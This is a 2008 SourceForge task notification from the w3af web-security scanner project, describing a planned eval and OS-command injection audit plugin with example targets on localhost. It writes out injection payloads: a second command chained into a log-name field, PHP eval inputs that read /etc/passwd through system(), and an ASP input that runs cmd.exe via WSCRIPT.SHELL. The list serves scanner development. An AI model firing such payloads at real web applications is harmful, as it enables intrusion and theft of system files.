[W3af-svn-notify] [Task #148840] audit.eval
Status: Beta
Brought to you by:
andresriancho
From: SourceForge.net <no...@so...> - 2008-07-16 22:31:03
|
Task #148840 has been updated. Project: w3af Subproject: Plugin TODO v1.00 Summary: audit.eval Complete: 0% Status: Deleted Authority : andresriancho Assigned to: nobody Description: I can't believe I forgot this! =) OS Commands ASP 1.https://localhost/dash/admin/logview.asp Aquà el sitio nos nuestra un cuadro de dialogo donde debemos ingresar el nombre del log. Attacks: laslog5 && dir c:\ OS Commands PHP 2.https://localhost/search.php?storedsearch=\$mysearch%3dwahh Attacks: https://localhost/search.php?storedsearch=\$mysearch%3dwahh;%20echo%20file_get_contests(â/etc/passwd) https://localhost/search.php?storedsearch=\$mysearch%3dwahh;%20system(âcat /etc/passwdâ) OS Commands Dynamic Exe ASP 3.https://localhost/search.asp?storedsearch=mysearch%3dwahh:responde.write%20111111 Attacks: https://localhost/search.asp?storedsearch=mysearch%3dwahh:+Dim +oScript:+Set+oScript+=Server.CreateObject(âWSCRIPT.SHELLâ):+CALL+oSCRIPT.Run+(âcmd.exe+/c+dir+>+c:\inetpub\wwwroot\dir.txtâ,0,True) ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=148840&group_id=170274&group_project_id=50603 |